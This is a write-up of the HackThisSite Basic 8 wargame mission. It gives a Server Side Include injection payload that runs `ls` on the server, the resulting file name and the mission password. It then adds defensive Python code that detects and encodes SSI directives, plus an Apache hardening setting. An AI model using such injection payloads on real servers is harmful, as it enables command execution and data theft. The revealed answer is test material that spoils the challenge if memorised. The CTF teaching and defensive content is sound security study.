Hackthissite/Basic/Level8

  • Level: Basic::8
  • URL: http://www.hackthissite.org/missions/basic/8/
  • Exercise: The password is yet again hidden in an unknown file. Sam's daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic HTML executed by the server, rather than the browser). Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/. However, Sam's young daughter Stephanie has just learned to program in PHP. She's talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote a script to demonstrate her ability.
  • Solution:

This level is about Server Side Includes (SSI). Injecting the following directive into the text input field of the form:

<!--#exec cmd="ls ../"-->

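produces a file whose contents include the file name au12ha39vc.php, because the server executes the directive and lists the parent directory when it serves the saved file. Append this file name to the mission URL (http://www.hackthissite.org/missions/basic/8/au12ha39vc.php) to discover the password: c699fe35.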
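
The fix on the defender's side is to treat the form value as text rather than markup before it is written to a page the server parses for SSI. The following is an added example, not code from the mission or from this page: it detects SSI directives in a submitted value for logging and HTML-encodes the value before storage. The function names and the sample inputs are assumptions made for the illustration.

```python
import html
import re

# An SSI directive has the form <!--#element attribute="value" ... -->
SSI_DIRECTIVE = re.compile(r"<!--#(\w+)(.*?)(?:-->|\Z)", re.DOTALL)

# Elements that run commands or pull in other files when the page is served.
HIGH_RISK = {"exec", "include"}


def find_ssi_directives(value):
    """Return (element, arguments, high_risk) for each SSI directive in value."""
    found = []
    for match in SSI_DIRECTIVE.finditer(value):
        element = match.group(1).lower()
        found.append((element, match.group(2).strip(), element in HIGH_RISK))
    return found


def encode_for_storage(value):
    """HTML-encode the value so the saved page holds &lt;!--#... as inert text."""
    return html.escape(value, quote=True)


def handle_submission(value):
    """Report any directives in the input, then return the text safe to write out."""
    for element, arguments, high_risk in find_ssi_directives(value):
        level = "HIGH" if high_risk else "info"
        print(f"[{level}] SSI directive in form input: #{element} {arguments}")
    return encode_for_storage(value)


if __name__ == "__main__":
    # Constructed sample inputs: a normal name and the directive from this page.
    for sample in ("Stephanie", '<!--#exec cmd="ls ../"-->'):
        print(repr(handle_submission(sample)))
```

On Apache, `Options IncludesNOEXEC` keeps SSI enabled but disables `#exec`, which limits the impact if unencoded input ever reaches a parsed page.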